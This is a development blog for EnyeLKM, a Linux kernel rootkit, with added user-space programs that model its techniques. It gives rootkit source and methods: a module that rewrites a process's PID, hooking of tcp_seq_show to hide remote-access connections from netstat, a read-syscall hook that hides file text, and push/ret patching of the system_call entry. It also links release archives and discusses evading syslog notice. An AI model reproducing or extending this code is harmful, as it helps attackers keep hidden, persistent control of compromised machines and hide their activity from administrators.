Change the PID in the Process Descriptor

January 23rd, 2008

(To understand what I am about to explain, I recommend reading Understanding the Linux Kernel (3rd Edition).)

Now that I have some spare time for EnyeLKM, I will explain a simple way to change the PID of a process.

The method is to walk the list of process descriptors with the for_each_process macro until the task_struct whose pid field equals the PID X we want to replace is found, and then overwrite that field with the new PID. (I recommend reading up on task_struct.) Two things a reader should keep in mind: the kernel normally walks this list under tasklist_lock (or RCU), and this proof of concept does it without any lock, so it can race with processes being created or exiting; and the pid field is not the only place the kernel keeps a PID (for a thread-group leader, tgid, which is what sys_getpid returns on 2.6, and the pid hash used by find_task_by_pid are left untouched), so after the swap the descriptor disagrees with those other places.

LKM to change the PID of a process:

/*
Project : EnyeLKM priv8 version
Module  : Swapper DEMO (Fistconference Version)
Author  : David Reguera Garcia
-
Update  : 28 November 2006
-
The spinlocks (tasklist_lock) have been removed in this POC :P
*/

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/sched.h>      /* struct task_struct, for_each_process */
#include <linux/version.h>
#include "Swapper.h"

static int pid_to_find = 0;
static int pid_to_change = 0;

/* module_param() replaced MODULE_PARM() in 2.5.47 */
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,5,47)
MODULE_PARM( pid_to_find, "i" );
MODULE_PARM( pid_to_change, "i" );
#else
module_param( pid_to_find, int, S_IRUGO );
module_param( pid_to_change, int, S_IRUGO );
#endif

int init_module( void )
{
    struct task_struct * actual_task;

    if ( ( pid_to_find == 0 ) || ( pid_to_change == 0 ) )
    {
        printk( KERN_INFO "Swapper Syntax: pid_to_find=pid pid_to_change=pid.\n" );
        return -EINVAL;
    }

    /* Walk the circular task list hanging off init_task.  Done without
     * tasklist_lock on purpose in this POC (see the header comment). */
    for_each_process( actual_task )
    {
        if ( actual_task->pid == pid_to_find )
        {
            printk( KERN_INFO "Found process: %d.\n", actual_task->pid );
            actual_task->pid = pid_to_change;   /* the swap itself */
            printk( KERN_INFO "Changed to: %d.\n", actual_task->pid );
            return 0;   /* module stays loaded; rmmod runs cleanup_module */
        }
    }
    printk( KERN_INFO "Process not found: %d.\n", pid_to_find );
    return -ESRCH;
}

void cleanup_module( void )
{
    printk( KERN_INFO "Swapper unloaded\n" );
}

/* EOF */

Code (LKMs) with scripts to make the job easier:

swapping_and_list_pids_from_pd.tar.gz
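The walk above cannot be run outside a kernel, so the following is an added example (written for this page, not code from EnyeLKM or its tarball) that models it in user space: the same list_entry/container_of mechanism that for_each_process is built on, over a constructed ring of three descriptors, with a swap_pid that goes one step beyond the POC by refusing to create two descriptors with the same PID and by keeping tgid in step for a thread-group leader. The task_struct field subset, the sample processes and the PID values are all assumptions made for the demo.

```c
/* Added example, not code from EnyeLKM: a user-space model of the process-list
 * walk the Swapper module performs.  The kernel's for_each_process() is built
 * on list_entry()/container_of() over the circular "tasks" list hanging off
 * init_task; the structures below reproduce that mechanism with only the
 * fields the demo needs.  The process list itself is constructed sample data. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

struct list_head { struct list_head *next, *prev; };

#define container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))
#define list_entry(ptr, type, member) container_of(ptr, type, member)

/* Minimal stand-in for struct task_struct (assumed field subset). */
struct task_struct {
    int pid;
    int tgid;
    char comm[16];
    struct list_head tasks;   /* links the processes in a ring */
};

/* init_task closes the ring on itself, as in the kernel. */
static struct task_struct init_task = {
    .pid = 0, .tgid = 0, .comm = "swapper",
    .tasks = { &init_task.tasks, &init_task.tasks },
};

#define next_task(p) list_entry((p)->tasks.next, struct task_struct, tasks)
#define for_each_process(p) \
    for (p = &init_task; (p = next_task(p)) != &init_task; )

/* Link a new task just before init_task, as copy_process() does on fork. */
static void add_task(struct task_struct *t)
{
    t->tasks.next = &init_task.tasks;
    t->tasks.prev = init_task.tasks.prev;
    init_task.tasks.prev->next = &t->tasks;
    init_task.tasks.prev = &t->tasks;
}

static struct task_struct demo_tasks[3];

/* Build a constructed three-process list (sample data, not real kernel state).
 * Safe to call repeatedly: it resets the ring first. */
void build_demo_list(void)
{
    static const struct { int pid; const char *comm; } seed[3] = {
        { 1, "init" }, { 1234, "sshd" }, { 2048, "bash" },
    };
    int i;
    init_task.tasks.next = init_task.tasks.prev = &init_task.tasks;
    for (i = 0; i < 3; i++) {
        demo_tasks[i].pid = demo_tasks[i].tgid = seed[i].pid;
        strncpy(demo_tasks[i].comm, seed[i].comm, sizeof demo_tasks[i].comm - 1);
        demo_tasks[i].comm[sizeof demo_tasks[i].comm - 1] = '\0';
        add_task(&demo_tasks[i]);
    }
}

/* Return the comm of the task whose pid field is pid, or NULL: the check a
 * reader performs after the swap. */
const char *lookup_comm(int pid)
{
    struct task_struct *p;
    for_each_process(p)
        if (p->pid == pid)
            return p->comm;
    return NULL;
}

/* Swap pid_to_find to pid_to_change in the first matching descriptor.
 * Returns 0 on success, -1 if no task has pid_to_find (or an argument is 0),
 * -2 if pid_to_change is already in use.  Beyond the POC it refuses a PID
 * collision and, for a thread-group leader (pid == tgid), also updates tgid,
 * which is what sys_getpid() returns on 2.6. */
int swap_pid(int pid_to_find, int pid_to_change)
{
    struct task_struct *p;

    if (pid_to_find == 0 || pid_to_change == 0)
        return -1;
    if (lookup_comm(pid_to_change) != NULL)
        return -2;
    for_each_process(p) {
        if (p->pid == pid_to_find) {
            if (p->tgid == p->pid)
                p->tgid = pid_to_change;
            p->pid = pid_to_change;
            return 0;
        }
    }
    return -1;
}

int main(void)
{
    build_demo_list();
    printf("swap 1234 -> 4321: %d\n", swap_pid(1234, 4321));
    printf("pid 4321 is now %s; pid 1234 is %s\n",
           lookup_comm(4321), lookup_comm(1234) ? lookup_comm(1234) : "gone");
    printf("swap 1 -> 4321 (collision): %d\n", swap_pid(1, 4321));
    return 0;
}
```

The collision check is the part worth carrying back into a real module: nothing in the kernel stops two descriptors from ending up with the same pid field, and a second walk that matches the wrong one is the kind of mistake that shows up later as a crash on exit.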


Posted by David Reguera Garcia

Blog new users

January 23rd, 2008

Blog visitors who want to cooperate in the development of EnyeLKM, or who want to be able to post comments, can send an email to:
Dreg@fr33project.org

They must specify why they want to cooperate or post comments, and what they can contribute to the blog.

Notice: not all emails can be answered, and not all users will be able to take part in the development or contribute comments to the blog.


Posted by David Reguera Garcia

Translation to english

January 23rd, 2008

The blog has been completely translated into English by delcoyote. Many, many thanks for all the hours of work that made it possible.

From now on, when a comment or post is written it is RECOMMENDED to write it in both Spanish and English. To do so, we just need to write (the spaces inside the brackets "[ ]" must be DELETED):

[ lang_en ] Text in english [ /lang_en ]
[ lang_es ] Same text in spanish [ /lang_es ]

This way the information reaches many more people.


Posted by David Reguera Garcia

Hiding remote access

April 3rd, 2007

Hi.
I have almost finished the new system for hiding remote-access connections. Before, it was done in a messy way by redirecting the read syscall, which would sometimes cause errors when running netstat. Now I will do it by redirecting the function that prints /proc/net/tcp (tcp_seq_show, I think it was called). I have already redirected it; I only need to write the new one that checks whether the IP is the one that has to be hidden, etc. In a couple of days or less I think it will be ready; no hack was needed, because the symbol to redirect is exported. Later, when it is finished, it has to be added to the uninstall module, because things have to be left as they were; otherwise, when we run netstat, it will jump to our function, which no longer exists, and the process will fail.
Greetings.


Posted by RaiSe
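The post above describes the decision a hooked /proc/net/tcp printer has to make per connection. As an added example (written for this page, not RaiSe's or EnyeLKM's code), here is that filter modelled in user space over already-formatted /proc/net/tcp lines, so it runs without a kernel: the lines and the addresses in them are constructed, and the hidden IP is an assumed value. The one detail worth seeing is the address encoding, since the kernel prints the raw in-memory __be32 with %08X, which on little-endian x86 turns 127.0.0.1 into 0100007F.

```c
/* Added example, not EnyeLKM code: a user-space model of the filter a hooked
 * tcp_seq_show() would apply.  The kernel hook decides per socket whether to
 * emit the line; here the decision is made on already-formatted /proc/net/tcp
 * text.  The sample lines below are constructed. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* /proc/net/tcp prints the address as the raw in-memory __be32 with %08X, so
 * on little-endian x86 127.0.0.1 appears as 0100007F.  Reproduce that
 * encoding from dotted-quad text, independent of the host's endianness. */
uint32_t proc_tcp_addr(const char *dotted)
{
    unsigned a, b, c, d;
    if (sscanf(dotted, "%u.%u.%u.%u", &a, &b, &c, &d) != 4)
        return 0;
    return (d << 24) | (c << 16) | (b << 8) | a;
}

/* 1 if this /proc/net/tcp line involves hidden_addr as local or remote
 * address, 0 otherwise.  The header line and unparsable lines are kept. */
int line_matches(const char *line, uint32_t hidden_addr)
{
    unsigned local, rem;
    if (sscanf(line, " %*d: %8x:%*4x %8x:%*4x", &local, &rem) != 2)
        return 0;
    return local == hidden_addr || rem == hidden_addr;
}

/* Copy every line of `in` to `out` except those involving hidden_ip.
 * Returns the number of lines dropped, or -1 if `out` is too small. */
int filter_proc_net_tcp(const char *in, const char *hidden_ip,
                        char *out, size_t outsz)
{
    uint32_t hidden = proc_tcp_addr(hidden_ip);
    size_t used = 0;
    int dropped = 0;
    const char *p = in;

    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p + 1) : strlen(p);
        if (line_matches(p, hidden)) {
            dropped++;
        } else {
            if (used + len + 1 > outsz)
                return -1;
            memcpy(out + used, p, len);
            used += len;
        }
        p += len;
    }
    out[used] = '\0';
    return dropped;
}

/* Constructed sample: a listener, a connection from 10.0.2.1 (the one to
 * hide) and an unrelated connection from 10.0.2.50, all on host 10.0.2.2. */
const char sample_proc_net_tcp[] =
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 8817 1 00000000 300 0 0 2 -1\n"
    "   1: 0202000A:0016 0102000A:C2A4 01 00000000:00000000 00:00000000 00000000     0        0 9034 1 00000000 20 4 30 10 -1\n"
    "   2: 0202000A:0016 3202000A:D1F0 01 00000000:00000000 00:00000000 00000000     0        0 9102 1 00000000 20 4 30 10 -1\n";

int main(void)
{
    char out[1024];
    int dropped = filter_proc_net_tcp(sample_proc_net_tcp, "10.0.2.1",
                                      out, sizeof out);
    printf("dropped %d line(s); what netstat would see:\n%s", dropped, out);
    return 0;
}
```

Matching on the local address as well as the remote one matters for the case RaiSe describes: hiding "an IP" is only complete if the filter also drops the sockets where that address appears as the local end, which is what happens when the hidden host is the one running the rootkit.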

Remembering Nethox post

March 24th, 2007

December 10th, 2006
Hello.
With the less pager, when a file containing hidden text between the corresponding marks is read, there is strange behaviour: when it is read for the first time, or when scrolling downwards, the text comes out hidden; when scrolling backwards, the text is visible.
This can be reproduced repeatedly by scrolling up and down within the same run of less.
The stdout of a complete strace run (without filter options) of less reproducing this behaviour with the LKM's own README.txt and its hiding example:

# strace less LEEME.txt

less version: 394
Kernel version (kernel.org): 2.6.18
Greetings.
Comments:
David Reguera García
_____________________
Hello Nethox, welcome to the blog; it is a pleasure to have you around. In my opinion what should be done is to filter by offset: build a sort of table of ranges from the offsets where there is hidden text, and when an attempt is made to read at one of those offsets, put the pointer in front of or behind the hidden text (depending on where we are trying to read). That way you avoid touching the file content; a redirection or something similar would also be needed for when the file with hidden text is saved, so that it is rewritten again with the new hidden text. Would this be viable? Would it be interesting to investigate? Any other ideas? You decide :-). Greetings.
RaiSe
__________________________
Hi. The hooked read syscall only checks for the marks inside the buffer that read will read; for example, if the program executes read(pepe, buf, 1024), hacked_read reads those 1024 bytes, checks whether the marks are there and, if they are, deletes them, and the new buffer is what is returned to user space. So if a program does reads byte by byte the hiding does not work, nor when small reads are done in which both marks are not read within the same read. Greetings.
RaiSe, how are you getting on with the shell over TCP? Have you done anything else? You can upload your releases or segments of code if you like :-).


Posted by David Reguera Garcia
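RaiSe's explanation above pins the less behaviour on a single property of the hook: it can only remove a hidden span when both marks land in the same read buffer. As an added example (written for this page, not the EnyeLKM hacked_read), here is that buffer-level stripping in user space together with a simulated reader that feeds a file through it in chunks, so the failure mode is reproducible: a 1024-byte read hides the text, an 8-byte read does not. The mark strings, the file contents and the chunk sizes are constructed for the demo and are not EnyeLKM's real marks.

```c
/* Added example, not EnyeLKM's hacked_read: a user-space model of the
 * buffer-level mark stripping the thread describes, plus a simulated reader
 * that feeds a file through it in chunks, to show why a pager that reads in
 * small pieces (or re-reads at different offsets) sees the hidden text.
 * The mark strings and the file contents are constructed for the demo. */
#include <stdio.h>
#include <string.h>

#define OPEN_MARK  "<hide>"     /* assumed marks, not EnyeLKM's real ones */
#define CLOSE_MARK "</hide>"

/* Remove every OPEN_MARK..CLOSE_MARK span (marks included) from buf[0..len).
 * Returns the new length.  An open mark whose close mark does not fall inside
 * the same buffer is copied through unchanged: exactly the limitation the
 * thread points out. */
size_t strip_marked(char *buf, size_t len)
{
    const size_t olen = strlen(OPEN_MARK), clen = strlen(CLOSE_MARK);
    size_t r = 0, w = 0;

    while (r < len) {
        if (len - r >= olen && memcmp(buf + r, OPEN_MARK, olen) == 0) {
            size_t k = r + olen;
            while (k + clen <= len && memcmp(buf + k, CLOSE_MARK, clen) != 0)
                k++;
            if (k + clen <= len) {      /* close mark found: drop the span */
                r = k + clen;
                continue;
            }
        }
        buf[w++] = buf[r++];
    }
    return w;
}

/* Simulate a process reading `file` through the hooked read() in requests of
 * `chunk` bytes, concatenating what user space would see into out.
 * Returns the number of bytes delivered. */
size_t read_through_hook(const char *file, size_t chunk, char *out, size_t outsz)
{
    const size_t flen = strlen(file);
    size_t off = 0, used = 0;
    char tmp[4096];

    if (chunk == 0 || chunk > sizeof tmp)
        chunk = sizeof tmp;
    while (off < flen) {
        size_t n = flen - off < chunk ? flen - off : chunk;
        size_t kept;
        memcpy(tmp, file + off, n);
        kept = strip_marked(tmp, n);          /* what hacked_read does */
        if (used + kept >= outsz)
            break;
        memcpy(out + used, tmp, kept);
        used += kept;
        off += n;
    }
    out[used] = '\0';
    return used;
}

/* Constructed README with one hidden block, like the LEEME.txt example. */
const char demo_file[] =
    "EnyeLKM README\n"
    "<hide>secret: the module is loaded\n</hide>"
    "Usage: insmod enyelkm.ko\n";

int main(void)
{
    char out[512];
    read_through_hook(demo_file, 1024, out, sizeof out);
    printf("read(..., 1024) sees:\n%s\n", out);
    read_through_hook(demo_file, 8, out, sizeof out);
    printf("read(..., 8) sees:\n%s\n", out);
    return 0;
}
```

Any pager or editor that seeks backwards and re-reads a window that starts inside the hidden span hits the same case as the 8-byte read: the close mark is in the buffer but the open mark is not, so nothing is stripped. That is the behaviour Nethox saw when scrolling up, and it is why David's offset-table suggestion (deciding per file offset rather than per buffer) is the more robust direction.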

EnyeLKM 1.1.4-fix

March 24th, 2007

http://www.fr33project.org/projects/enyelkm-1.1.4-fix.rar

Fixed the hacked_read problem (atomic_t) for unloading, and fixed the version in the Makefile.

In the next version Swapper will be implemented :-).

P.S.: Unloading will not be possible until the reads have finished, because if it were not done this way it would be very noticeable in the syslogd messages.


Posted by David Reguera Garcia

EnyeLKM 1.1.4

March 23rd, 2007

http://www.fr33project.org/projects/enyelkm-1.1.4.rar

New module: restore_memory.c. The module is able to save the memory overwritten by the jumps so that it can be restored later, when the module is unloaded (before, unloading was not possible).

When hooking (the original bytes are saved before the push/ret is written):
    create_push_ret( & push_ret, (unsigned long) new_idt );
    save_memory( (unsigned long) p, & backup_memory );
    write_push_ret( ( void *) p, & push_ret );

LKM's cleanup function:
    restore_memory( & backup_memory );
    __dev_remove_pack( & my_pkt );
    /* let processes that are 'reading' finish */
    while ( read_activo != 0 || can_unload_lkm != 1 )
        schedule();

Modification in new_idt:
    void new_idt( void )
    {
        can_unload_lkm = 0;
        ....
        can_unload_lkm = 1;
        JmPushRet( after_call )

The semaphore (the can_unload_lkm flag) is there in case any redirected system call is being executed while we unload.
P.S.: To try it, comment out the hide_module() function.


Posted by David Reguera Garcia

EnyeLKM 1.1.3

March 22nd, 2007

http://www.fr33project.org/projects/enyelkm-1.1.3.rar

EnyeLKM 1.1.2 obtains the SYSENTER entry at run time with the instruction rdmsr( MSR_IA32_SYSENTER_EIP, psysenter_entry, v2 ); it does not give a single warning when running make!!!

Also, all of base.c has been reprogrammed and two new modules have been created:
extern_symbols, where the functions to obtain symbols external to the LKM live, for example:
/* thx to Int27h :-). */
void * get_sysenter_entry( void )
{
    void * psysenter_entry = NULL;
    unsigned long v2;
    /* rdmsr() fills the low 32 bits (the EIP) into psysenter_entry and the
     * high 32 bits into v2; only CPUs with SEP have a SYSENTER entry. */
    if ( boot_cpu_has( X86_FEATURE_SEP ) )
        rdmsr( MSR_IA32_SYSENTER_EIP, psysenter_entry, v2 );
    else
        return NULL;
    return psysenter_entry;
}

The lowlevel_layer module has also been created: thanks to it we can abstract ourselves quite a lot from the modules that search memory for opcodes and from the rest of the functions, for example:
void set_idt_handler( void * system_call )
{
    unsigned char * p;
    push_ret_t push_ret;
    p = (unsigned char *) system_call;
    /* first jump: scan forward to the jnb (0f 83) and back up to the cmp */
    while ( !is_jnb_opcode( (unsigned char *) p ) )
        p ++;
    p -= DISTANCE_FROM_CMP_NR_SYSCALL_TO_JNB;
    create_push_ret( & push_ret, (unsigned long) new_idt );
    write_push_ret( ( void *) p, & push_ret );
}

And before, this looked like:
void set_idt_handler(void *system_call)
{
    unsigned char *p;
    unsigned long *p2;
    p = (unsigned char *) system_call;
    /* first jump: find jnb rel32 (0f 83) by hand */
    while (!((*p == 0x0f) && (*(p+1) == 0x83)))
        p++;
    p -= 5;                 /* back to the cmp $NR_syscalls,%eax */
    *p++ = 0x68;            /* push imm32 */
    p2 = (unsigned long *) p;
    *p2++ = (unsigned long) new_idt;
    p = (unsigned char *) p2;
    *p = 0xc3;              /* ret */
}

As we can see, it is now much easier to abstract ourselves from the problem thanks to the "lowlevel" layer.
The next thing I will develop is the possibility of unloading the module; at least another module for memory management, with WRITE-AND-RESTORE on load, will have to be created.

What do you think, RaiSe? Do you like it?


Posted by David Reguera Garcia
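The two set_idt_handler versions above, together with the save_memory/restore_memory cycle from the 1.1.4 post, are the whole of the patching mechanism, so here is an added example (written for this page, not EnyeLKM's lowlevel_layer or restore_memory.c) that models it in user space: locate the jnb, back up to the cmp, save the bytes, write the push/ret stub, and restore. The bytes standing in for the 2.6 i386 system_call entry, the NR_syscalls value and the target address are constructed; the jump-distance constant is taken from the "before" code's p -= 5 and the bounded scan and the too-close check are additions the original does not have.

```c
/* Added example, not EnyeLKM code: a user-space model of the lowlevel_layer
 * helpers from the 1.1.3 post (find the jnb, build and write a push/ret
 * trampoline) together with the save_memory/restore_memory cycle from the
 * 1.1.4 post.  The system_call byte sequence, the NR_syscalls value and the
 * target address are constructed for the demo; the jump-distance constant is
 * an assumption taken from the 'before' code's p -= 5. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define PUSH_RET_LEN 6                         /* push imm32 (5) + ret (1) */
#define DISTANCE_FROM_CMP_NR_SYSCALL_TO_JNB 5  /* cmp $imm32,%eax is 5 bytes */

typedef struct { unsigned char bytes[PUSH_RET_LEN]; } push_ret_t;
typedef struct {
    unsigned char *where;
    unsigned char saved[PUSH_RET_LEN];
} backup_memory_t;

/* jnb rel32 (jae) is encoded 0f 83 <rel32>. */
int is_jnb_opcode(const unsigned char *p)
{
    return p[0] == 0x0f && p[1] == 0x83;
}

/* push $target ; ret -- diverts execution to target without a relative
 * displacement, so the stub works wherever it is written. */
void create_push_ret(push_ret_t *pr, uint32_t target)
{
    pr->bytes[0] = 0x68;                                   /* push imm32 */
    pr->bytes[1] = (unsigned char)(target & 0xff);         /* little-endian */
    pr->bytes[2] = (unsigned char)((target >> 8) & 0xff);
    pr->bytes[3] = (unsigned char)((target >> 16) & 0xff);
    pr->bytes[4] = (unsigned char)((target >> 24) & 0xff);
    pr->bytes[5] = 0xc3;                                   /* ret */
}

void save_memory(unsigned char *p, backup_memory_t *b)
{
    b->where = p;
    memcpy(b->saved, p, PUSH_RET_LEN);
}

void write_push_ret(unsigned char *p, const push_ret_t *pr)
{
    memcpy(p, pr->bytes, PUSH_RET_LEN);
}

void restore_memory(const backup_memory_t *b)
{
    memcpy(b->where, b->saved, PUSH_RET_LEN);
}

/* Locate the patch point as set_idt_handler() does: scan forward to the first
 * jnb rel32 and back up to the cmp that precedes it.  Unlike the original,
 * the scan is bounded by len and a jnb too close to the start is refused.
 * Returns NULL if nothing usable is found. */
unsigned char *find_patch_point(unsigned char *code, size_t len)
{
    unsigned char *p;
    for (p = code; p + 1 < code + len; p++) {
        if (is_jnb_opcode(p)) {
            if ((size_t)(p - code) < DISTANCE_FROM_CMP_NR_SYSCALL_TO_JNB)
                return NULL;
            return p - DISTANCE_FROM_CMP_NR_SYSCALL_TO_JNB;
        }
    }
    return NULL;
}

/* Hook: back up the bytes, then overwrite the cmp and the first byte of the
 * jnb with the trampoline.  Returns the patch offset, or -1.  The hook target
 * (new_idt in EnyeLKM) must re-execute the clobbered cmp and jump back. */
int install_hook(unsigned char *code, size_t len, uint32_t target,
                 backup_memory_t *backup)
{
    push_ret_t push_ret;
    unsigned char *p = find_patch_point(code, len);
    if (p == NULL || (size_t)(p - code) + PUSH_RET_LEN > len)
        return -1;
    create_push_ret(&push_ret, target);
    save_memory(p, backup);
    write_push_ret(p, &push_ret);
    return (int)(p - code);
}

/* Constructed stand-in for the bytes around the NR_syscalls check in the
 * 2.6 i386 system_call entry: filler, cmp $0x13e,%eax, jnb rel32, filler. */
unsigned char fake_system_call[] = {
    0x50, 0x55,                          /* push %eax ; push %ebp (filler) */
    0x3d, 0x3e, 0x01, 0x00, 0x00,        /* cmp $0x13e,%eax */
    0x0f, 0x83, 0x34, 0x12, 0x00, 0x00,  /* jnb +0x1234 */
    0x89, 0xe5,                          /* mov %esp,%ebp (filler) */
};

int main(void)
{
    backup_memory_t backup;
    size_t i;
    int off = install_hook(fake_system_call, sizeof fake_system_call,
                           0xc0123456u, &backup);
    printf("patched at offset %d:", off);
    for (i = 0; i < sizeof fake_system_call; i++)
        printf(" %02x", fake_system_call[i]);
    restore_memory(&backup);
    printf("\nrestored: %s\n",
           memcmp(backup.saved, fake_system_call + off, PUSH_RET_LEN) == 0
               ? "ok" : "mismatch");
    return 0;
}
```

Note what the six-byte stub clobbers: the five-byte cmp and the first byte of the jnb. The second byte of the jnb (0x83) survives, which is why the hook target has to redo the comparison itself and return to the instruction after the jnb rather than to the patched bytes; it is also why the backup taken by save_memory has to be exactly PUSH_RET_LEN bytes long, and why restore_memory must run before the module's code disappears, as the 1.1.4 post's cleanup ordering shows.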

Basic platform.

March 20th, 2007

http://www.fr33project.org/projects/enyelkm-1.1.2.rar

You can implement whatever you want on top of the easy-hook version.

Do you think it's OK?

I have added myself to the credits; should I take myself off them?

P.S.: SYSENTER has to be implemented as Int27h said, and the use of cat in the Makefile needs improving, because it is not very elegant (among other things).


Posted by David Reguera Garcia

We’re open again

March 20th, 2007

After having parked the project for so long, we are back again :-). RaiSe: are you around?


Posted by David Reguera Garcia